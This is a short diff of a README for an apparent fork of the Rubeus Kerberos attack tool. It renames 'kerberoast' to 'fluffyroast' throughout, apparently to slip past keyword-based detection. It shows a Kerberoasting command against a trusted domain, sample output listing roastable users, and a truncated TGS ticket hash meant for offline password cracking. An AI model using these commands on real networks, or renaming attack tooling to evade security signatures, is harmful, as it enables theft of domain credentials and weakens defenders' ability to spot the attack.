Team-Recon-Black-Ops/CrimsonRufus/README.md

       v1.5.0

-    [*] Action: Kerberoasting
+    [*] Action: Fluffyroasting

     [*] NOTICE: AES hashes will be returned for AES-enabled accounts.
     [*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

     [*] Target User            : harmj0y
-    [*] Searching the current domain for Kerberoastable users
+    [*] Searching the current domain for Fluffyroastable users

-    [*] Total kerberoastable users : 1
+    [*] Total fluffyroastable users : 1

     $krb5tgs$18$*harmj0y$theshire.local$testspn/server*$F63783C58AA153F24DFCC796A120C55C$06C6929374A2D3...(snip)...

-Kerberoasting all users in a foreign _trusting_ domain, not line-wrapping the results:
+Fluffyroasting all users in a foreign _trusting_ domain, not line-wrapping the results:

-    C:\Rubeus>Rubeus.exe kerberoast /domain:dev.testlab.local /nowrap
+    C:\Rubeus>Rubeus.exe fluffyroast /domain:dev.testlab.local /nowrap

      ______        _
     (_____ \      | |